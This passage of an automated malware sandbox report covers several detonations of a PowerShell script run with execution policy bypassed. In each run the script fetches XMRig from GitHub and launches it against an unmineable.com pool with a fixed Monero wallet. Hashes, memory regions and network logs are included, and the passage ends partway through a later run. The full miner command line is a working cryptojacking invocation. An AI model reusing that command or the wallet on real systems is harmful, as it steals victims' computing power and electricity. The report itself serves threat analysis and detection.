memory/3272-0-0x00007FF8262D3000-0x00007FF8262D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4n2rxhdv.mtg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3272-9-0x0000019279690000-0x00000192796B2000-memory.dmp

memory/3272-10-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/3272-11-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/3272-12-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/3272-14-0x0000019279B90000-0x0000019279BA2000-memory.dmp

memory/3272-15-0x0000019279B80000-0x0000019279B8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1272-46-0x00000244B2410000-0x00000244B2430000-memory.dmp

memory/1272-47-0x00000244B2460000-0x00000244B2480000-memory.dmp

memory/1272-48-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/3272-49-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/3272-51-0x00007FF8262D3000-0x00007FF8262D5000-memory.dmp

memory/1272-50-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-53-0x00000244B24A0000-0x00000244B24C0000-memory.dmp

memory/1272-52-0x00000244B2480000-0x00000244B24A0000-memory.dmp

memory/3272-54-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/1272-55-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-56-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-58-0x00000244B24A0000-0x00000244B24C0000-memory.dmp

memory/1272-57-0x00000244B2480000-0x00000244B24A0000-memory.dmp

memory/1272-59-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-60-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-61-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-62-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-63-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-64-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-65-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-66-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-67-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240226-en

Max time kernel

146s

Max time network

138s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2268 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 216.58.201.106:443 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/1368-0-0x00007FFC22ED3000-0x00007FFC22ED5000-memory.dmp

memory/1368-6-0x0000025CD8DD0000-0x0000025CD8DF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wspivrpz.xcx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1368-11-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1368-12-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1368-13-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1368-15-0x00007FFC22ED3000-0x00007FFC22ED5000-memory.dmp

memory/1368-16-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1368-17-0x0000025CD9AF0000-0x0000025CD9B02000-memory.dmp

memory/1368-18-0x0000025CD9AE0000-0x0000025CD9AEA000-memory.dmp

memory/1368-19-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1368-48-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1484-51-0x000001DB618A0000-0x000001DB618C0000-memory.dmp

memory/1484-52-0x000001DB632A0000-0x000001DB632C0000-memory.dmp

memory/1484-53-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-54-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-57-0x000001DBF5E90000-0x000001DBF5EB0000-memory.dmp

memory/1484-56-0x000001DBF5E70000-0x000001DBF5E90000-memory.dmp

memory/1484-55-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-58-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-59-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-60-0x000001DBF5E70000-0x000001DBF5E90000-memory.dmp

memory/1484-61-0x000001DBF5E90000-0x000001DBF5EB0000-memory.dmp

memory/1484-62-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-63-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-64-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-65-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-66-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-67-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

147s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp

Files

memory/3508-3-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x000001CE32040000-0x000001CE32062000-memory.dmp

memory/3508-8-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-9-0x000001CE321F0000-0x000001CE32266000-memory.dmp

memory/3508-18-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulzrbx3p.245.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-48-0x000001CE32370000-0x000001CE32382000-memory.dmp

memory/3508-61-0x000001CE321D0000-0x000001CE321DA000-memory.dmp

memory/3508-83-0x00007FF992773000-0x00007FF992774000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2576-91-0x000002146BEB0000-0x000002146BED0000-memory.dmp

memory/3508-92-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-94-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/2576-93-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-95-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-96-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-97-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-98-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-99-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-100-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-101-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-102-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-103-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-104-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-105-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-106-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

142s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp

Files

memory/1944-4-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1944-5-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1944-6-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1944-7-0x000001D66E620000-0x000001D66E642000-memory.dmp

memory/1944-10-0x000001D66E8F0000-0x000001D66E966000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ks3vrjr0.ofv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1944-25-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1944-61-0x000001D66E6A0000-0x000001D66E6AA000-memory.dmp

memory/1944-48-0x000001D66E6B0000-0x000001D66E6C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3916-90-0x00000293E6620000-0x00000293E6640000-memory.dmp

memory/3916-91-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/1944-92-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/3916-93-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/1944-94-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/3916-95-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-96-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-97-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-98-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-99-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-100-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-101-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-102-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-103-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-104-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-105-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3144,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp

Files

memory/3912-0-0x00007FFC145E0000-0x00007FFC148A9000-memory.dmp

memory/3912-1-0x00007FFC145E0000-0x00007FFC148A9000-memory.dmp

memory/3912-2-0x00007FFC145E0000-0x00007FFC148A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qhymaskh.ze0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3912-12-0x00000183C7820000-0x00000183C7842000-memory.dmp

memory/3912-14-0x00007FFC145E0000-0x00007FFC148A9000-memory.dmp

memory/3912-15-0x00000183C9B20000-0x00000183C9B32000-memory.dmp

memory/3912-16-0x00000183AF330000-0x00000183AF33A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2256-47-0x0000024EDC5A0000-0x0000024EDC5C0000-memory.dmp

memory/2256-48-0x00007FFC145E0000-0x00007FFC148A9000-memory.dmp

memory/3912-50-0x00007FFC145E0000-0x00007FFC148A9000-memory.dmp

memory/2256-49-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-51-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-52-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-53-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-54-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-55-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-56-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-57-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-58-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-59-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-60-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-61-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

memory/2256-62-0x00007FF7980F0000-0x00007FF798D23000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240419-en

Max time kernel

145s

Max time network

154s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
